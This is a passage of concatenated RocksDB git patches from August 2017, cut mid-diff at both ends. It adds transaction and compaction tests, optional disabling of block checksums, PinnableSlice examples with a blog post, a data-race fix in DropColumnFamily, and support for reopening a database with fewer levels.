b/utilities/transactions/transaction_test.cc index 0eaaf20acb6..2e8c87f49ac 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -17,7 +17,6 @@ #include "rocksdb/utilities/transaction_db.h" #include "table/mock_table.h" #include "util/fault_injection_test_env.h" -#include "util/logging.h" #include "util/random.h" #include "util/string_util.h" #include "util/sync_point.h" @@ -26,6 +25,7 @@ #include "util/transaction_test_util.h" #include "utilities/merge_operators.h" #include "utilities/merge_operators/string_append/stringappend.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include "port/port.h" @@ -33,8 +33,8 @@ using std::string; namespace rocksdb { -class TransactionTest - : public ::testing::TestWithParam> { +class TransactionTest : public ::testing::TestWithParam< + std::tuple> { public: TransactionDB* db; FaultInjectionTestEnv* env; @@ -57,6 +57,7 @@ class TransactionTest DestroyDB(dbname, options); txn_db_options.transaction_lock_timeout = 0; txn_db_options.default_lock_timeout = 0; + txn_db_options.write_policy = std::get<2>(GetParam()); Status s; if (std::get<0>(GetParam()) == false) { s = TransactionDB::Open(options, txn_db_options, dbname, &db); @@ -123,16 +124,23 @@ class TransactionTest }; class MySQLStyleTransactionTest : public TransactionTest {}; +class WritePreparedTransactionTest : public TransactionTest {}; +static const TxnDBWritePolicy wc = WRITE_COMMITTED; +static const TxnDBWritePolicy wp = WRITE_PREPARED; +// TODO(myabandeh): Instantiate the tests with other write policies INSTANTIATE_TEST_CASE_P(DBAsBaseDB, TransactionTest, - ::testing::Values(std::make_tuple(false, false))); + ::testing::Values(std::make_tuple(false, false, wc))); INSTANTIATE_TEST_CASE_P(StackableDBAsBaseDB, TransactionTest, - ::testing::Values(std::make_tuple(true, false))); + ::testing::Values(std::make_tuple(true, false, wc))); INSTANTIATE_TEST_CASE_P(MySQLStyleTransactionTest, MySQLStyleTransactionTest, - ::testing::Values(std::make_tuple(false, false), - std::make_tuple(false, true), - std::make_tuple(true, false), - std::make_tuple(true, true))); + ::testing::Values(std::make_tuple(false, false, wc), + std::make_tuple(false, true, wc), + std::make_tuple(true, false, wc), + std::make_tuple(true, true, wc))); +INSTANTIATE_TEST_CASE_P(WritePreparedTransactionTest, + WritePreparedTransactionTest, + ::testing::Values(std::make_tuple(false, true, wp))); TEST_P(TransactionTest, DoubleEmptyWrite) { WriteOptions write_options; @@ -4720,6 +4728,128 @@ TEST_P(TransactionTest, MemoryLimitTest) { delete txn; } +// Test WritePreparedTxnDB's IsInSnapshot against different ordering of +// snapshot, max_committed_seq_, prepared, and commit entries. +TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) { + WriteOptions wo; + // Use small commit cache to trigger lots of eviction and fast advance of + // max_evicted_seq_ + WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = + 8; // will take effect after ReOpen + + // Take some preliminary snapshots first. This is to stress the data structure + // that holds the old snapshots as it will be designed to be efficient when + // only a few snapshots are below the max_evicted_seq_. + for (int max_snapshots = 1; max_snapshots < 20; max_snapshots++) { + // Leave some gap between the preliminary snapshots and the final snapshot + // that we check. This should test for also different overlapping scnearios + // between the last snapshot and the commits. + for (int max_gap = 1; max_gap < 10; max_gap++) { + // Since we do not actually write to db, we mock the seq as it would be + // increaased by the db. The only exception is that we need db seq to + // advance for our snapshots. for which we apply a dummy put each time we + // increase our mock of seq. + uint64_t seq = 0; + // At each step we prepare a txn and then we commit it in the next txn. + // This emulates the consecuitive transactions that write to the same key + uint64_t cur_txn = 0; + // Number of snapshots taken so far + int num_snapshots = 0; + // Number of gaps applied so far + int gap_cnt = 0; + // The final snapshot that we will inspect + uint64_t snapshot = 0; + bool found_committed = false; + // To stress the data structure that maintain prepared txns, at each cycle + // we add a new prepare txn. These do not mean to be committed for + // snapshot inspection. + std::set prepared; + // We keep the list of txns comitted before we take the last snaphot. + // These should be the only seq numbers that will be found in the snapshot + std::set committed_before; + ReOpen(); // to restart the db + WritePreparedTxnDB* wp_db = dynamic_cast(db); + assert(wp_db); + assert(wp_db->db_impl_); + // We continue until max advances a bit beyond the snapshot. + while (!snapshot || wp_db->max_evicted_seq_ < snapshot + 100) { + // do prepare for a transaction + wp_db->db_impl_->Put(wo, "key", "value"); // dummy put to inc db seq + seq++; + ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq); + wp_db->AddPrepared(seq); + prepared.insert(seq); + + // If cur_txn is not started, do prepare for it. + if (!cur_txn) { + wp_db->db_impl_->Put(wo, "key", "value"); // dummy put to inc db seq + seq++; + ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq); + cur_txn = seq; + wp_db->AddPrepared(cur_txn); + } else { // else commit it + wp_db->db_impl_->Put(wo, "key", "value"); // dummy put to inc db seq + seq++; + ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq); + wp_db->AddCommitted(cur_txn, seq); + if (!snapshot) { + committed_before.insert(cur_txn); + } + cur_txn = 0; + } + + if (num_snapshots < max_snapshots - 1) { + // Take preliminary snapshots + db->GetSnapshot(); + num_snapshots++; + } else if (gap_cnt < max_gap) { + // Wait for some gap before taking the final snapshot + gap_cnt++; + } else if (!snapshot) { + // Take the final snapshot if it is not already taken + snapshot = db->GetSnapshot()->GetSequenceNumber(); + // We increase the db seq artificailly by a dummy Put. Check that this + // technique is effective and db seq is that same as ours. + ASSERT_EQ(snapshot, seq); + num_snapshots++; + } + + // If the snapshot is taken, verify seq numbers visible to it. We redo + // it at each cycle to test that the system is still sound when + // max_evicted_seq_ advances. + if (snapshot) { + for (uint64_t s = 0; s <= seq; s++) { + bool was_committed = + (committed_before.find(s) != committed_before.end()); + bool is_in_snapshot = wp_db->IsInSnapshot(s, snapshot); + if (was_committed != is_in_snapshot) { + printf( + "max_snapshots %d max_gap %d seq %lu max %lu snapshot %lu " + "gap_cnt %d num_snapshots %d\n", + max_snapshots, max_gap, seq, wp_db->max_evicted_seq_.load(), + snapshot, gap_cnt, num_snapshots); + } + ASSERT_EQ(was_committed, is_in_snapshot); + found_committed = found_committed || is_in_snapshot; + } + } + } + // Safety check to make sure the test actually ran + ASSERT_TRUE(found_committed); + // As an extra check, check if prepared set will be properly empty after + // they are committed. + if (cur_txn) { + wp_db->AddCommitted(cur_txn, seq); + } + for (auto p : prepared) { + wp_db->AddCommitted(p, seq); + } + ASSERT_TRUE(wp_db->delayed_prepared_.empty()); + ASSERT_TRUE(wp_db->prepared_txns_.empty()); + } + } +} + } // namespace rocksdb int main(int argc, char** argv) { From 7eba54eb9b769246a6e93fa96155e034fde01a5d Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 23 Aug 2017 14:05:30 -0700 Subject: [PATCH 147/205] test compaction input-level split range tombstone assumption Summary: One of the core assumptions of DeleteRange is that files containing portions of the same range tombstone are treated as a single unit from the perspective of compaction picker. Need better tests for this. This PR adds the tests for manual compaction. Closes https://github.com/facebook/rocksdb/pull/2769 Differential Revision: D5676677 Pulled By: ajkr fbshipit-source-id: 1b4b3382b300ff7048b872911405fdf900e4fbec --- db/db_range_del_test.cc | 68 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc index d80c9d14495..dbc27e870c1 100644 --- a/db/db_range_del_test.cc +++ b/db/db_range_del_test.cc @@ -894,6 +894,74 @@ TEST_F(DBRangeDelTest, MemtableBloomFilter) { } } +TEST_F(DBRangeDelTest, CompactionTreatsSplitInputLevelDeletionAtomically) { + // make sure compaction treats files containing a split range deletion in the + // input level as an atomic unit. I.e., compacting any input-level file(s) + // containing a portion of the range deletion causes all other input-level + // files containing portions of that same range deletion to be included in the + // compaction. + const int kNumFilesPerLevel = 4, kValueBytes = 4 << 10; + Options options = CurrentOptions(); + options.compression = kNoCompression; + options.level0_file_num_compaction_trigger = kNumFilesPerLevel; + options.memtable_factory.reset( + new SpecialSkipListFactory(2 /* num_entries_flush */)); + options.target_file_size_base = kValueBytes; + // i == 0: CompactFiles + // i == 1: CompactRange + // i == 2: automatic compaction + for (int i = 0; i < 3; ++i) { + DestroyAndReopen(options); + + ASSERT_OK(Put(Key(0), "")); + ASSERT_OK(db_->Flush(FlushOptions())); + MoveFilesToLevel(2); + ASSERT_EQ(1, NumTableFilesAtLevel(2)); + + // snapshot protects range tombstone from dropping due to becoming obsolete. + const Snapshot* snapshot = db_->GetSnapshot(); + db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0), + Key(2 * kNumFilesPerLevel)); + + Random rnd(301); + std::string value = RandomString(&rnd, kValueBytes); + for (int j = 0; j < kNumFilesPerLevel; ++j) { + // give files overlapping key-ranges to prevent trivial move + ASSERT_OK(Put(Key(j), value)); + ASSERT_OK(Put(Key(2 * kNumFilesPerLevel - 1 - j), value)); + if (j > 0) { + dbfull()->TEST_WaitForFlushMemTable(); + ASSERT_EQ(j, NumTableFilesAtLevel(0)); + } + } + // put extra key to trigger final flush + ASSERT_OK(Put("", "")); + dbfull()->TEST_WaitForFlushMemTable(); + dbfull()->TEST_WaitForCompact(); + ASSERT_EQ(0, NumTableFilesAtLevel(0)); + ASSERT_EQ(kNumFilesPerLevel, NumTableFilesAtLevel(1)); + + ColumnFamilyMetaData meta; + db_->GetColumnFamilyMetaData(&meta); + if (i == 0) { + ASSERT_OK(db_->CompactFiles( + CompactionOptions(), {meta.levels[1].files[0].name}, 2 /* level */)); + } else if (i == 1) { + auto begin_str = Key(0), end_str = Key(1); + Slice begin = begin_str, end = end_str; + ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &begin, &end)); + } else if (i == 2) { + ASSERT_OK(db_->SetOptions(db_->DefaultColumnFamily(), + {{"max_bytes_for_level_base", "10000"}})); + dbfull()->TEST_WaitForCompact(); + } + ASSERT_EQ(0, NumTableFilesAtLevel(1)); + ASSERT_GT(NumTableFilesAtLevel(2), 0); + + db_->ReleaseSnapshot(snapshot); + } +} + #endif // ROCKSDB_LITE } // namespace rocksdb From 19cc66dc4f8ab765f4e1415115fe4639c878a210 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 23 Aug 2017 14:55:26 -0700 Subject: [PATCH 148/205] fix clang bug in block-based table reader Summary: This is the warning that clang considers a bug and has been causing it to fail: ``` table/block_based_table_reader.cc:240:27: warning: Potential leak of memory pointed to by 'block.value' for (; biter.Valid(); biter.Next()) { ^~~~~ ``` Actually clang just doesn't have enough knowledge to statically determine it's safe. We can teach it using an assert. Closes https://github.com/facebook/rocksdb/pull/2779 Differential Revision: D5691225 Pulled By: ajkr fbshipit-source-id: 3f0d545bf44636953b30ee5243c63239e8f16d8e --- table/block_based_table_reader.cc | 3 +++ 1 file changed, 3 insertions(+) diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index e047c644325..d8c6d807c8c 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -257,6 +257,7 @@ class PartitionIndexReader : public IndexReader, public Cleanable { handle, compression_dict, &block, is_index); + assert(s.ok() || block.value == nullptr); if (s.ok() && block.value != nullptr) { assert(block.cache_handle != nullptr); if (pin) { @@ -1429,6 +1430,7 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( FilePrefetchBuffer* prefetch_buffer, Rep* rep, const ReadOptions& ro, const BlockHandle& handle, Slice compression_dict, CachableEntry* block_entry, bool is_index) { + assert(block_entry != nullptr); const bool no_io = (ro.read_tier == kBlockCacheTier); Cache* block_cache = rep->table_options.block_cache.get(); Cache* block_cache_compressed = @@ -1485,6 +1487,7 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( } } } + assert(s.ok() || block_entry->value == nullptr); return s; } From 7fbb9eccafb2421a020a60b26e0413d3cff1cdf0 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 23 Aug 2017 19:31:40 -0700 Subject: [PATCH 149/205] support disabling checksum in block-based table Summary: store a zero as the checksum when disabled since it's easier to keep block trailer a fixed length. Closes https://github.com/facebook/rocksdb/pull/2781 Differential Revision: D5694702 Pulled By: ajkr fbshipit-source-id: 69cea9da415778ba2b600dfd9d0dfc8cb5188ecd --- HISTORY.md | 1 + db/db_basic_test.cc | 52 +++++++++++++----------------- include/rocksdb/table.h | 2 +- table/block_based_table_builder.cc | 5 ++- table/format.cc | 4 ++- tools/db_stress.cc | 30 ++++++++++++++++- 6 files changed, 59 insertions(+), 35 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index a63d9d62861..581e6b3ad58 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -10,6 +10,7 @@ * Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. * Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`. * Add `DB::VerifyChecksum()`, which verifies the checksums in all SST files in a running DB. +* Block-based table support for disabling checksums by setting `BlockBasedTableOptions::checksum = kNoChecksum`. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc index a2604081b4d..654a457ef5d 100644 --- a/db/db_basic_test.cc +++ b/db/db_basic_test.cc @@ -792,36 +792,30 @@ TEST_F(DBBasicTest, MultiGetEmpty) { TEST_F(DBBasicTest, ChecksumTest) { BlockBasedTableOptions table_options; Options options = CurrentOptions(); + // change when new checksum type added + int max_checksum = static_cast(kxxHash); + const int kNumPerFile = 2; + + // generate one table with each type of checksum + for (int i = 0; i <= max_checksum; ++i) { + table_options.checksum = static_cast(i); + options.table_factory.reset(NewBlockBasedTableFactory(table_options)); + Reopen(options); + for (int j = 0; j < kNumPerFile; ++j) { + ASSERT_OK(Put(Key(i * kNumPerFile + j), Key(i * kNumPerFile + j))); + } + ASSERT_OK(Flush()); + } - table_options.checksum = kCRC32c; - options.table_factory.reset(NewBlockBasedTableFactory(table_options)); - Reopen(options); - ASSERT_OK(Put("a", "b")); - ASSERT_OK(Put("c", "d")); - ASSERT_OK(Flush()); // table with crc checksum - - table_options.checksum = kxxHash; - options.table_factory.reset(NewBlockBasedTableFactory(table_options)); - Reopen(options); - ASSERT_OK(Put("e", "f")); - ASSERT_OK(Put("g", "h")); - ASSERT_OK(Flush()); // table with xxhash checksum - - table_options.checksum = kCRC32c; - options.table_factory.reset(NewBlockBasedTableFactory(table_options)); - Reopen(options); - ASSERT_EQ("b", Get("a")); - ASSERT_EQ("d", Get("c")); - ASSERT_EQ("f", Get("e")); - ASSERT_EQ("h", Get("g")); - - table_options.checksum = kCRC32c; - options.table_factory.reset(NewBlockBasedTableFactory(table_options)); - Reopen(options); - ASSERT_EQ("b", Get("a")); - ASSERT_EQ("d", Get("c")); - ASSERT_EQ("f", Get("e")); - ASSERT_EQ("h", Get("g")); + // verify data with each type of checksum + for (int i = 0; i <= kxxHash; ++i) { + table_options.checksum = static_cast(i); + options.table_factory.reset(NewBlockBasedTableFactory(table_options)); + Reopen(options); + for (int j = 0; j < (max_checksum + 1) * kNumPerFile; ++j) { + ASSERT_EQ(Key(j), Get(Key(j))); + } + } } // On Windows you can have either memory mapped file or a file diff --git a/include/rocksdb/table.h b/include/rocksdb/table.h index 04e532e161c..1b4c0ced90d 100644 --- a/include/rocksdb/table.h +++ b/include/rocksdb/table.h @@ -43,7 +43,7 @@ struct Options; using std::unique_ptr; enum ChecksumType : char { - kNoChecksum = 0x0, // not yet supported. Will fail + kNoChecksum = 0x0, kCRC32c = 0x1, kxxHash = 0x2, }; diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index e87def73e7e..d42e0f8b7aa 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -551,9 +551,8 @@ void BlockBasedTableBuilder::WriteRawBlock(const Slice& block_contents, char* trailer_without_type = trailer + 1; switch (r->table_options.checksum) { case kNoChecksum: - // we don't support no checksum yet - assert(false); - // intentional fallthrough + EncodeFixed32(trailer_without_type, 0); + break; case kCRC32c: { auto crc = crc32c::Value(block_contents.data(), block_contents.size()); crc = crc32c::Extend(crc, trailer, 1); // Extend to cover block type diff --git a/table/format.cc b/table/format.cc index e5f2df0074a..364766e9a80 100644 --- a/table/format.cc +++ b/table/format.cc @@ -102,7 +102,7 @@ inline uint64_t UpconvertLegacyFooterFormat(uint64_t magic_number) { // to make the total size 2 * BlockHandle::kMaxEncodedLength // table_magic_number (8 bytes) // new footer format: -// checksum (char, 1 byte) +// checksum type (char, 1 byte) // metaindex handle (varint64 offset, varint64 size) // index handle (varint64 offset, varint64 size) // to make the total size 2 * BlockHandle::kMaxEncodedLength + 1 @@ -278,6 +278,8 @@ Status CheckBlockChecksum(const ReadOptions& options, const Footer& footer, uint32_t value = DecodeFixed32(data + block_size + 1); uint32_t actual = 0; switch (footer.checksum()) { + case kNoChecksum: + break; case kCRC32c: value = crc32c::Unmask(value); actual = crc32c::Value(data, block_size + 1); diff --git a/tools/db_stress.cc b/tools/db_stress.cc index 86776cf9737..d18eeab0c75 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -44,6 +44,7 @@ int main() { #include "db/version_set.h" #include "hdfs/env_hdfs.h" #include "monitoring/histogram.h" +#include "options/options_helper.h" #include "port/port.h" #include "rocksdb/cache.h" #include "rocksdb/env.h" @@ -426,10 +427,30 @@ enum rocksdb::CompressionType StringToCompressionType(const char* ctype) { else if (!strcasecmp(ctype, "zstd")) return rocksdb::kZSTD; - fprintf(stdout, "Cannot parse compression type '%s'\n", ctype); + fprintf(stderr, "Cannot parse compression type '%s'\n", ctype); return rocksdb::kSnappyCompression; //default value } +enum rocksdb::ChecksumType StringToChecksumType(const char* ctype) { + assert(ctype); + auto iter = rocksdb::checksum_type_string_map.find(ctype); + if (iter != rocksdb::checksum_type_string_map.end()) { + return iter->second; + } + fprintf(stderr, "Cannot parse checksum type '%s'\n", ctype); + return rocksdb::kCRC32c; +} + +std::string ChecksumTypeToString(rocksdb::ChecksumType ctype) { + auto iter = std::find_if( + rocksdb::checksum_type_string_map.begin(), + rocksdb::checksum_type_string_map.end(), + [&](const std::pair& + name_and_enum_val) { return name_and_enum_val.second == ctype; }); + assert(iter != rocksdb::checksum_type_string_map.end()); + return iter->first; +} + std::vector SplitString(std::string src) { std::vector ret; if (src.empty()) { @@ -451,6 +472,9 @@ DEFINE_string(compression_type, "snappy", static enum rocksdb::CompressionType FLAGS_compression_type_e = rocksdb::kSnappyCompression; +DEFINE_string(checksum_type, "kCRC32c", "Algorithm to use to checksum blocks"); +static enum rocksdb::ChecksumType FLAGS_checksum_type_e = rocksdb::kCRC32c; + DEFINE_string(hdfs, "", "Name of hdfs environment"); // posix or hdfs environment static rocksdb::Env* FLAGS_env = rocksdb::Env::Default(); @@ -2128,6 +2152,8 @@ class StressTest { 1 << FLAGS_log2_keys_per_lock); std::string compression = CompressionTypeToString(FLAGS_compression_type_e); fprintf(stdout, "Compression : %s\n", compression.c_str()); + std::string checksum = ChecksumTypeToString(FLAGS_checksum_type_e); + fprintf(stdout, "Checksum type : %s\n", checksum.c_str()); fprintf(stdout, "Max subcompactions : %" PRIu64 "\n", FLAGS_subcompactions); @@ -2162,6 +2188,7 @@ class StressTest { BlockBasedTableOptions block_based_options; block_based_options.block_cache = cache_; block_based_options.block_cache_compressed = compressed_cache_; + block_based_options.checksum = FLAGS_checksum_type_e; block_based_options.block_size = FLAGS_block_size; block_based_options.format_version = 2; block_based_options.filter_policy = filter_policy_; @@ -2412,6 +2439,7 @@ int main(int argc, char** argv) { } FLAGS_compression_type_e = StringToCompressionType(FLAGS_compression_type.c_str()); + FLAGS_checksum_type_e = StringToChecksumType(FLAGS_checksum_type.c_str()); if (!FLAGS_hdfs.empty()) { FLAGS_env = new rocksdb::HdfsEnv(FLAGS_hdfs); } From 7fdf735d5dd71b7f92a1ff5a64312ff1bc08c5d3 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Thu, 24 Aug 2017 12:20:15 -0700 Subject: [PATCH 150/205] Pinnableslice examples and blog post Summary: Closes https://github.com/facebook/rocksdb/pull/2788 Differential Revision: D5700189 Pulled By: maysamyabandeh fbshipit-source-id: 6f043e652093ff904e52f6d35190855781b87673 --- ...17-05-12-partitioned-index-filter.markdown | 2 +- docs/_posts/2017-08-24-pinnableslice.markdown | 37 +++++++++++++++++++ examples/simple_example.cc | 27 ++++++++++++++ 3 files changed, 65 insertions(+), 1 deletion(-) create mode 100644 docs/_posts/2017-08-24-pinnableslice.markdown diff --git a/docs/_posts/2017-05-12-partitioned-index-filter.markdown b/docs/_posts/2017-05-12-partitioned-index-filter.markdown index fb4f62cd8ea..a537feb0c7e 100644 --- a/docs/_posts/2017-05-12-partitioned-index-filter.markdown +++ b/docs/_posts/2017-05-12-partitioned-index-filter.markdown @@ -31,4 +31,4 @@ In this example we have a DB of size 86G on HDD and emulate the small memory tha In this example we have a DB of size 300G on SSD and emulate the small memory that would be available in presence of other DBs on the same node by by using direct IO (skipping OS file cache) and block cache of size 6G and 2G. Without partitioning the linkbench throughput drops from 38k tps to 23k when reducing block cache size from 6G to 2G. With partitioning the throughput drops from 38k to only 30k. -Learn more (here)[https://github.com/facebook/rocksdb/wiki/Partitioned-Index-Filters]. +Learn more [here](https://github.com/facebook/rocksdb/wiki/Partitioned-Index-Filters). diff --git a/docs/_posts/2017-08-24-pinnableslice.markdown b/docs/_posts/2017-08-24-pinnableslice.markdown new file mode 100644 index 00000000000..a5026d5c4c7 --- /dev/null +++ b/docs/_posts/2017-08-24-pinnableslice.markdown @@ -0,0 +1,37 @@ +--- +title: PinnableSlice: less memcpy with point lookups +layout: post +author: maysamyabandeh +category: blog +--- + +The classic API for [DB::Get](https://github.com/facebook/rocksdb/blob/9e583711144f580390ce21a49a8ceacca338fcd5/include/rocksdb/db.h#L310) receives a std::string as argument to which it will copy the value. The memcpy overhead could be non-trivial when the value is large. The [new API](https://github.com/facebook/rocksdb/blob/9e583711144f580390ce21a49a8ceacca338fcd5/include/rocksdb/db.h#L322) receives a PinnableSlice instead, which avoids memcpy in most of the cases. + +### What is PinnableSlice? + +Similarly to Slice, PinnableSlice refers to some in-memory data so it does not incur the memcpy cost. To ensure that the data will not be erased while it is being processed by the user, PinnableSlice, as its name suggests, has the data pinned in memory. The pinned data are released when PinnableSlice object is destructed or when ::Reset is invoked explicitly on it. + +### How good it is? + +Here are the improvements in throughput for an [in-memory benchmark](https://github.com/facebook/rocksdb/pull/1756#issuecomment-286201693): +* value 1k byte: 14% +* value 10k byte: 34% + +### Any limitations? + +PinnableSlice tries to avoid memcpy as much as possible. The primary gain is when reading large values from the block cache. There are however cases that it would still have to copy the data into its internal buffer. The reason is mainly the complexity of implementation and if there is enough motivation on the application side. the scope of PinnableSlice could be extended to such cases too. These include: +* Merged values +* Reads from memtables + +### How to use it? + +```cpp +PinnableSlice pinnable_val; +while (!stopped) { + auto s = db->Get(opt, cf, key, &pinnable_val); + // ... use it + pinnable_val.Reset(); // then release it immediately +} +``` + +You can also [initialize the internal buffer](https://github.com/facebook/rocksdb/blob/9e583711144f580390ce21a49a8ceacca338fcd5/include/rocksdb/db.h#L314) of PinnableSlice by passing your own string in the constructor. [simple_example.cc](https://github.com/facebook/rocksdb/blob/master/examples/simple_example.cc) demonstrates that with more examples. diff --git a/examples/simple_example.cc b/examples/simple_example.cc index 52fffff5bf7..a8f80f091e6 100644 --- a/examples/simple_example.cc +++ b/examples/simple_example.cc @@ -50,6 +50,33 @@ int main() { db->Get(ReadOptions(), "key2", &value); assert(value == "value"); + { + PinnableSlice pinnable_val; + db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val); + assert(pinnable_val == "value"); + } + + { + std::string string_val; + // If it cannot pin the value, it copies the value to its internal buffer. + // The intenral buffer could be set during construction. + PinnableSlice pinnable_val(&string_val); + db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val); + assert(pinnable_val == "value"); + // If the value is not pinned, the internal buffer must have the value. + assert(pinnable_val.IsPinned() || string_val == "value"); + } + + PinnableSlice pinnable_val; + db->Get(ReadOptions(), db->DefaultColumnFamily(), "key1", &pinnable_val); + assert(s.IsNotFound()); + // Reset PinnableSlice after each use and before each reuse + pinnable_val.Reset(); + db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val); + assert(pinnable_val == "value"); + pinnable_val.Reset(); + // The Slice pointed by pinnable_val is not valid after this point + delete db; return 0; From 92bfd6c5078fa7bbf7a2caacfddbec255e9098ba Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 24 Aug 2017 14:54:57 -0700 Subject: [PATCH 151/205] Fix DropColumnFamily data race Summary: It should hold db mutex while accessing max_total_in_memory_state_. Closes https://github.com/facebook/rocksdb/pull/2784 Differential Revision: D5696536 Pulled By: yiwu-arbug fbshipit-source-id: 45430634d7fe11909b38e42e5f169f618681c4ee --- db/db_impl.cc | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/db/db_impl.cc b/db/db_impl.cc index a197ca5c8b0..4aba14c6077 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1324,6 +1324,11 @@ Status DBImpl::DropColumnFamilyImpl(ColumnFamilyHandle* column_family) { &edit, &mutex_); write_thread_.ExitUnbatched(&w); } + if (s.ok()) { + auto* mutable_cf_options = cfd->GetLatestMutableCFOptions(); + max_total_in_memory_state_ -= mutable_cf_options->write_buffer_size * + mutable_cf_options->max_write_buffer_number; + } if (!cf_support_snapshot) { // Dropped Column Family doesn't support snapshot. Need to recalculate @@ -1345,9 +1350,6 @@ Status DBImpl::DropColumnFamilyImpl(ColumnFamilyHandle* column_family) { // later inside db_mutex. EraseThreadStatusCfInfo(cfd); assert(cfd->IsDropped()); - auto* mutable_cf_options = cfd->GetLatestMutableCFOptions(); - max_total_in_memory_state_ -= mutable_cf_options->write_buffer_size * - mutable_cf_options->max_write_buffer_number; ROCKS_LOG_INFO(immutable_db_options_.info_log, "Dropped column family with id %u\n", cfd->GetID()); } else { From 3c840d1a6dc194a6dcdbf886b0438dc176804c44 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 24 Aug 2017 16:05:16 -0700 Subject: [PATCH 152/205] Allow DB reopen with reduced options.num_levels Summary: Allow user to reduce number of levels in LSM by issue a full CompactRange() and put the result in a lower level, and then reopen DB with reduced options.num_levels. Previous this will fail on reopen on when recovery replaying the previous MANIFEST and found a historical file was on a higher level than the new options.num_levels. The workaround was after CompactRange(), reopen the DB with old num_levels, which will create a new MANIFEST, and then reopen the DB again with new num_levels. This patch relax the check of levels during recovery. It allows DB to open if there was a historical file on level > options.num_levels, but was also deleted. Closes https://github.com/facebook/rocksdb/pull/2740 Differential Revision: D5629354 Pulled By: yiwu-arbug fbshipit-source-id: 545903f6b36b6083e8cbaf777176aef2f488021d --- db/db_test2.cc | 21 +++++++++ db/version_builder.cc | 99 +++++++++++++++++++++++++++++++++---------- db/version_builder.h | 1 + db/version_set.cc | 17 +++++--- 4 files changed, 111 insertions(+), 27 deletions(-) diff --git a/db/db_test2.cc b/db/db_test2.cc index c223f2b0082..8f00d20e7a8 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2304,6 +2304,27 @@ TEST_F(DBTest2, RateLimitedCompactionReads) { } } #endif // ROCKSDB_LITE + +// Make sure DB can be reopen with reduced number of levels, given no file +// is on levels higher than the new num_levels. +TEST_F(DBTest2, ReduceLevel) { + Options options; + options.disable_auto_compactions = true; + options.num_levels = 7; + Reopen(options); + Put("foo", "bar"); + Flush(); + MoveFilesToLevel(6); + ASSERT_EQ("0,0,0,0,0,0,1", FilesPerLevel()); + CompactRangeOptions compact_options; + compact_options.change_level = true; + compact_options.target_level = 1; + dbfull()->CompactRange(compact_options, nullptr, nullptr); + ASSERT_EQ("0,1", FilesPerLevel()); + options.num_levels = 3; + Reopen(options); + ASSERT_EQ("0,1", FilesPerLevel()); +} } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/version_builder.cc b/db/version_builder.cc index bab8d11f5a5..e8db67527ea 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -17,6 +17,7 @@ #include #include #include +#include #include #include #include @@ -87,7 +88,16 @@ class VersionBuilder::Rep { Logger* info_log_; TableCache* table_cache_; VersionStorageInfo* base_vstorage_; + int num_levels_; LevelState* levels_; + // Store states of levels larger than num_levels_. We do this instead of + // storing them in levels_ to avoid regression in case there are no files + // on invalid levels. The version is not consistent if in the end the files + // on invalid levels don't cancel out. + std::map> invalid_levels_; + // Whether there are invalid new files or invalid deletion on levels larger + // than num_levels_. + bool has_invalid_levels_; FileComparator level_zero_cmp_; FileComparator level_nonzero_cmp_; @@ -97,8 +107,10 @@ class VersionBuilder::Rep { : env_options_(env_options), info_log_(info_log), table_cache_(table_cache), - base_vstorage_(base_vstorage) { - levels_ = new LevelState[base_vstorage_->num_levels()]; + base_vstorage_(base_vstorage), + num_levels_(base_vstorage->num_levels()), + has_invalid_levels_(false) { + levels_ = new LevelState[num_levels_]; level_zero_cmp_.sort_method = FileComparator::kLevel0; level_nonzero_cmp_.sort_method = FileComparator::kLevelNon0; level_nonzero_cmp_.internal_comparator = @@ -106,7 +118,7 @@ class VersionBuilder::Rep { } ~Rep() { - for (int level = 0; level < base_vstorage_->num_levels(); level++) { + for (int level = 0; level < num_levels_; level++) { const auto& added = levels_[level].added_files; for (auto& pair : added) { UnrefFile(pair.second); @@ -137,7 +149,7 @@ class VersionBuilder::Rep { } #endif // make sure the files are sorted correctly - for (int level = 0; level < vstorage->num_levels(); 